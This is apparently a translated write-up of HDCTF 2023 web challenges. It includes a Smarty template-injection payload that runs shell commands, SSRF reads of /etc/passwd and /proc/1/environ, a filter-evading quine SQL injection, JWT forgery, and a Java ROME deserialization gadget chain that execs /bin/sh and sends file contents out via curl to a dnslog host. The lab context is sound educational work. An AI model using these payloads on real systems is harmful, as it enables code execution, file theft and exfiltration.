Welcome To HDCTF 2023
Look at the source code to find game.js
find this string
Put it on the console and run it
SearchMaster
The topic asks post to submit a data
Just pass one to execute on the page
![[External link picture transfer failed, the source site may have an anti-leeching mechanism, it is recommended to save the picture and upload it directly (img-08UzuIeS-1682231444902)(../../../AppData/Roaming/Typora/typora-user- images/image-20230422194238228.png)]](https://img-blog.csdnimg.cn/05c85b01ca9e4c6082c489ea7e575e6a.png)
When it is passed in, {
he will report an error, see the error message and find
Smarty, Guess Smarty's ssti, send the data to the front end
Just use the {if} tag
{
if phpinfo()}{
/if}
Can execute phpinfo()
Just execute the command directly
data={
if system('cat /f*')}{
/if}
YamiYami
Three links, click on read somethings to see the url
It should be ssrf try to read the file
?url=file:///etc/passwd
Can read, but can't read flag, try to read environment variable
?url=file:///proc/1/environ
You can see that the flag is in the environment variable
LoginMaster
Use dirsearch to scan the directory and scan out
/robots.txt
function checkSql($s)
{
if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){
alertMes('hacker', 'index.php');
}
}
if ($row['password'] === $password) {
die($FLAG);
} else {
alertMes("wrong password",'index.php');
You can refer to this
1'UNION(SELECT(REPLACE(REPLACE('1"UNION(SELECT(REPLACE(REPLACE("%",CHAR(34),CHAR(39)),CHAR(37),"%")))#',CHAR(34),CHAR(39)),CHAR(37),'1"UNION(SELECT(REPLACE(REPLACE("%",CHAR(34),CHAR(39)),CHAR(37),"%")))#')))#
JavaMonster
jwt
Change admin to Boogipop to decode the jwt incoming cookie:a=1;b=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2ODIxNzcxMTgsImlhdCI6MTY4MjE2OTkxOCwidXNlcm5hbWUiOiJCb29naXBvcCJ9.1dfoUuPRgwflPRL8beAumUMOCVFIRCV4yAjXd18Syko
public static void main(String[] args) throws UnsupportedEncodingException {
com.ctf.easyjava.utils.JwtUtil jwtUtil = new com.ctf.easyjava.utils.JwtUtil();
User user = new User("Boogipop", "123");
String token = jwtUtil.JwtCreate(user);
System.out.println(token);
System.out.println(jwtUtil.Jwttoken(token));
}
hashcode
The hash of USy to solve EasyJava is equal to Try to solve EasyJava
rome secondary deserialization
Bring the result into dnslog
package com.ctf.easyjava;
import com.ctf.easyjava.hdctf.HDCTF;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.syndication.feed.impl.EqualsBean;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;
import javax.xml.transform.Templates;
import java.util.HashMap;
import static com.ctf.easyjava.Tool.*;
public class R_SignedObject {
public static void main(String[] args) throws Exception{
ClassPool pool = ClassPool.getDefault();
CtClass ctClass = pool.makeClass("i");
CtClass superClass = pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet");
ctClass.setSuperclass(superClass);
CtConstructor constructor = ctClass.makeClassInitializer();
constructor.setBody("Runtime.getRuntime().exec(new String[]{\"/bin/sh\", \"-c\", \"cat /flag_is_is_here | while read line; do echo $line.4m7ytd.dnslog.cn | xargs curl; done\"});");
byte[] bytes = ctClass.toBytecode();
TemplatesImpl obj = new TemplatesImpl();
setFieldValue(obj, "_bytecodes", new byte[][]{bytes});
setFieldValue(obj, "_name", "Poria");
setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
HashMap table1 = getPayload(Templates.class, obj);
HDCTF hdctf = new HDCTF(table1);
HashMap table2 = getPayload(HDCTF.class, hdctf);
//
run(table2, "debug", "object");
}
public static HashMap getPayload (Class clazz, Object payloadObj) throws Exception{
EqualsBean bean = new EqualsBean(String.class, "r");
HashMap map1 = new HashMap();
HashMap map2 = new HashMap();
map1.put("yy", bean);
map1.put("zZ", payloadObj);
map2.put("zZ", bean);
map2.put("yy", payloadObj);
HashMap table = new HashMap();
table.put(map1, "1");
table.put(map2, "2");
setFieldValue(bean, "_beanClass", clazz);
setFieldValue(bean, "_obj", payloadObj);
return table;
}
}
